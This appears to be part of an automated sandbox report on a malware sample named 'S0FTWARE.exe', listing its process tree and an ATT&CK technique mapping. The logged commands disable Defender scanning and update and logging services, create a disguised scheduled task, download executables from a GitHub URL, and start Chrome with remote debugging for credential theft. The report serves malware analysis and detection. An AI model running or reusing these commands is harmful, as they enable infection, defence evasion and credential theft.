  "C:\Users\Admin\AppData\Local\pcfghvredizu\svrwkzmghj.exe"
  2⤵
  PID:844
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
    3⤵
    PID:5568
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5984
- C:\Users\Admin\AppData\Local\pcfghvredizu\cjjuztwbgkj.exe
  "C:\Users\Admin\AppData\Local\pcfghvredizu\cjjuztwbgkj.exe"
  2⤵
  PID:1124
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3012
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:2068
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:3336
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2240
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3008
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:5860
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:2352
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:3004
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:2976
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:4124
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:5972
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:5356
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
    3⤵
    - Launches sc.exe
    PID:4144

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:4684

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:3736

C:\ProgramData\GoogleUP\Chrome\Updater.exe
C:\ProgramData\GoogleUP\Chrome\Updater.exe
1⤵
PID:2456
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:5432
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:5220
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:4568
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:5884
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1452
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:5176
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:1628
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:5588
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:3252
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:5512
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:5356

C:\Users\Admin\Desktop\S0FTWARE.exe
"C:\Users\Admin\Desktop\S0FTWARE.exe"
1⤵
PID:6108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\miqrn', 'C:\Users', 'C:\ProgramData'"
  2⤵
  PID:3704
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\miqrn', 'C:\Users', 'C:\ProgramData'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\miqrn\wevfx.exe'"
  2⤵
  PID:5632
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\miqrn\wevfx.exe'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\miqrn\jmvtw.exe'"
  2⤵
  PID:2072
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\miqrn\jmvtw.exe'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5884
- C:\Users\Admin\AppData\Local\miqrn\wevfx.exe
  "C:\Users\Admin\AppData\Local\miqrn\wevfx.exe"
  2⤵
  PID:380
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    PID:2644
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff85ad5dcf8,0x7ff85ad5dd04,0x7ff85ad5dd10
      4⤵
      PID:4612
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    PID:2276
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff85ad5dcf8,0x7ff85ad5dd04,0x7ff85ad5dd10
      4⤵
      PID:5876
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1544,i,10835082338863000998,5228984544409128643,262144 --variations-seed-version --mojo-platform-channel-handle=2624 /prefetch:3
      4⤵
      PID:2736
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2536,i,10835082338863000998,5228984544409128643,262144 --variations-seed-version --mojo-platform-channel-handle=2532 /prefetch:2
      4⤵
      PID:5708
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2064,i,10835082338863000998,5228984544409128643,262144 --variations-seed-version --mojo-platform-channel-handle=2760 /prefetch:8
      4⤵
      PID:4568
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3216,i,10835082338863000998,5228984544409128643,262144 --variations-seed-version --mojo-platform-channel-handle=3272 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4700
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3208,i,10835082338863000998,5228984544409128643,262144 --variations-seed-version --mojo-platform-channel-handle=3252 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1512
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3840,i,10835082338863000998,5228984544409128643,262144 --variations-seed-version --mojo-platform-channel-handle=4436 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5868
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5024,i,10835082338863000998,5228984544409128643,262144 --variations-seed-version --mojo-platform-channel-handle=5036 /prefetch:8
      4⤵
      PID:1560
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5264,i,10835082338863000998,5228984544409128643,262144 --variations-seed-version --mojo-platform-channel-handle=5364 /prefetch:8
      4⤵
      PID:2372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\miqrn\hieqg.exe'"
  2⤵
  PID:116
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\miqrn\hieqg.exe'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3144
- C:\Users\Admin\AppData\Local\miqrn\jmvtw.exe
  "C:\Users\Admin\AppData\Local\miqrn\jmvtw.exe"
  2⤵
  PID:3204
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
    3⤵
    PID:5284
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5472
- C:\Users\Admin\AppData\Local\miqrn\hieqg.exe
  "C:\Users\Admin\AppData\Local\miqrn\hieqg.exe"
  2⤵
  PID:2432

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:3480

C:\ProgramData\GoogleUP\Chrome\Updater.exe
C:\ProgramData\GoogleUP\Chrome\Updater.exe
1⤵
PID:3076
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:3704
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:5216
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:5336
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:5640
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4316
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:5860
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2352
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:2072
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:3348
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:756
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:4124

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:3336

C:\Users\Admin\Desktop\S0FTWARE.exe
"C:\Users\Admin\Desktop\S0FTWARE.exe"
1⤵
PID:4696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\yonnbsncv', 'C:\Users', 'C:\ProgramData'"
  2⤵
  PID:2556
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\yonnbsncv', 'C:\Users', 'C:\ProgramData'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\yonnbsncv\fkskvyd.exe'"
  2⤵
  PID:5284
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\yonnbsncv\fkskvyd.exe'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4144

C:\Users\Admin\Desktop\S0FTWARE.exe
"C:\Users\Admin\Desktop\S0FTWARE.exe"
1⤵
PID:1492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\juerwjbjyigx', 'C:\Users', 'C:\ProgramData'"
  2⤵
  PID:5972

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Modify Authentication Process

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

System Information Discovery